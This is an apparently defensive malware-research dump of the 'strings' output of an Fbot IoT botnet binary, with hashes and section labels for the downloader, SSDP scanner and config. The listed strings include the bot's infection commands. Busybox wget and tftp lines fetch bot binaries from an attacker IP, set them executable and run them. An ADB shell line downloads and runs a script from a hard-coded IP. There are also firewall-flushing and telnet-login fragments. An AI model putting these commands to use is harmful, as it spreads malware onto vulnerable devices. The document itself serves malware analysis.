- The unpacked binary strings of a recent Fbot binary
- bot.x86_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV),
- statically linked, stripped
- MD5 (bot.x86_64) = ae975a5cdd9fb816a1e286e1a24d9144
- SHA1 (bot.x86_64) = a56595c303a1dd391c834f0a788f4cf1a9857c1e
- 31244 Feb 23 20:09 bot.x86_64*
- Dumped by @unixfreaxjp with "strings" - MalwareMustDie, NPO - malwaremustdie.org
- ---- strings start--------
- 9xsspnvgc8aj5pi7m28p
- x86_64
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
- GET /bot.x86_64 HTTP/1.0
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
- \x%02x
- enable
- system
- linuxshell
- development
- iptables -F
- /bin/busybox FBOT
- /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
- /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
- /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
- arm5
- mips
- mipsel
- get: applet not found
- ftp: applet not found
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
- cho: applet not found
- /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
- retrieve
- /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
- /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
- ./retrieve; ./.t telnet; >retrieve; >.t
- ECHODONE
- 9xsspnvgc8aj5pi7m28p
- /var/
- /dev/
- C H+C(L9
- []A\A]
- SHH9
- Z[]A\A]
- C8H9C(v
- 9xsspnvgc8aj5pi7m28p
- x86_64
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
- GET /bot.x86_64 HTTP/1.0
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
- \x%02x
- enable
- system
- linuxshell
- development
- iptables -F
- /bin/busybox FBOT
- /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
- /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
- /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
- arm5
- mips
- mipsel
- get: applet not found
- ftp: applet not found
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
- cho: applet not found
- /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
- retrieve
- /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
- /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
- ./retrieve; ./.t telnet; >retrieve; >.t
- ECHODONE
- 9xsspnvgc8aj5pi7m28p
- /var/
- /dev/
- /mnt/
- /var/run/
- /var/tmp/
- /dev/netslink/
- SHH9
- Z[]A\A]
- C8H9C(v
- 9xsspnvgc8aj5pi7m28p
- x86_64
- x86_64
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8.tmp
- GET /bot.x86_64 HTTP/1.0
- aAHnF8xVWXw584sf9aJ3jfSoaA43XYt8
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- /bin/busybox wget http://%d.%d.%d.%d/bot/bot.%s -O -> .t; /bin/busybox chmod 777 .t; ./.t telnet; >.t
- shell:cd /data/local/tmp/; rm -rf adb.sh; busybox wget http://194.180.224.13/bot/adb.sh -O -> adb.sh; sh adb.sh
- \x%02x
- enable
- system
- linuxshell
- development
- iptables -F
- /bin/busybox FBOT
- /bin/busybox cat /bin/busybox || while read i; do /bin/busybox echo $i; done < /bin/busybox || /bin/busybox dd if=/bin/busybox bs=22 count=1
- /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo; /bin/busybox FBOT
- /bin/busybox mkdir %s; >%sf && cd %s; >retrieve; >.t
- arm5
- mips
- mipsel
- get: applet not found
- ftp: applet not found
- /bin/busybox tftp -r bot.%s -l .t -g %d.%d.%d.%d; /bin/busybox chmod 777 .t; ./.t telnet
- cho: applet not found
- /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
- retrieve
- /bin/busybox echo -en '%s' %s %s && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
- /bin/busybox echo '%s\c' %s %s && /bin/busybox echo '\x45\x43\x48\x4f\x44\x4f\x4e\x45\c'
- ./retrieve; ./.t telnet; >retrieve; >.t
- ECHODONE
- 9xsspnvgc8aj5pi7m28p
- /var/
- /dev/
- /mnt/
- /var/run/
- /var/tmp/
- /dev/netslink/
- /dev/shm/
- /bin/
- /etc/
- /boot/
- /usr/
- /sys/
- arm4
- arm6
- arm7
- nvalid
- ailed
- ncorrect
- enied
- rror
- oodbye
- ogin
- sername
- vrdvs
- ccount
- enter
- assword
- usybox
- ulti-call
- help
- CNXN
- host::features=cmd,shell_v2
- OPENX
- RPSW
- [^_]
- UWVS
- [^_]=
- ---------embedded downloader-part--------
- MIRAI
- GET /bot/bot.x86 HTTP/1.0
- .shstrtab
- .text
- .rodata
- .bss
- !'
- !'
- mips
- MIRAI
- GET /bot/bot.mips HTTP/1.0
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .mdebug.abi32
- mipsel
- MIRAI
- GET /bot/bot.mipsel HTTP/1.0
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .mdebug.abi32
- arm5
- MIRAI
- GET /bot/bot.arm5 HTTP/1.0
- aeabi
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .ARM.attributes
- arm7
- MIRAI
- GET /bot/bot.arm7 HTTP/1.0
- aeabi
- .shstrtab
- .text
- .rodata
- .got
- .bss
- .ARM.attributes
- ---------end of embedded downloader-part--------
- ---------SSDP-scanner-------
- Host:
- M-SEARCH * HTTP/1.1
- Host:239.255.255.250:1900
- ST:ssdp:all
- Man:"ssdp:discover"
- MX:3
- stats
- objectClass0
- _services
- _dns-sd
- _udp
- local
- ----------end of SSDP------
- abcdefghijklmnopqrstuvwxyz0123456789
- ------crypted-config------------
- --------- end of crypted config-----------------
- /dev/null
- !#$$%%&&''(((())))****++++,,,,,,,,--------........////////
- __vdso_clock_gettime
- LINUX_2.6
- !"#
- !"#
- -0X+0X 0X-0x+0x 0x
- -+ 0X0x
- (null)
- 0123456789ABCDEF
- M(knN
- ---------GCC msgs------------
- Illegal byte sequence
- Domain error
- Result not representable
- Not a tty
- Permission denied
- Operation not permitted
- No such file or directory
- No such process
- File exists
- Value too large for data type
- No space left on device
- Out of memory
- Resource busy
- Interrupted system call
- Resource temporarily unavailable
- Invalid seek
- Cross-device link
- Read-only file system
- Directory not empty
- Connection reset by peer
- Operation timed out
- Connection refused
- Host is down
- Host is unreachable
- Address in use
- Broken pipe
- I/O error
- No such device or address
- Block device required
- No such device
- Not a directory
- Is a directory
- Text file busy
- Exec format error
- Invalid argument
- Argument list too long
- Symbolic link loop
- Filename too long
- Too many open files in system
- No file descriptors available
- Bad file descriptor
- No child process
- Bad address
- File too large
- Too many links
- No locks available
- Resource deadlock would occur
- State not recoverable
- Previous owner died
- Operation canceled
- Function not implemented
- No message of desired type
- Identifier removed
- Device not a stream
- No data available
- ---------- end of strings---------
- Research material of malwaremustdie.org, Feb 2020
- @unixfreaxjp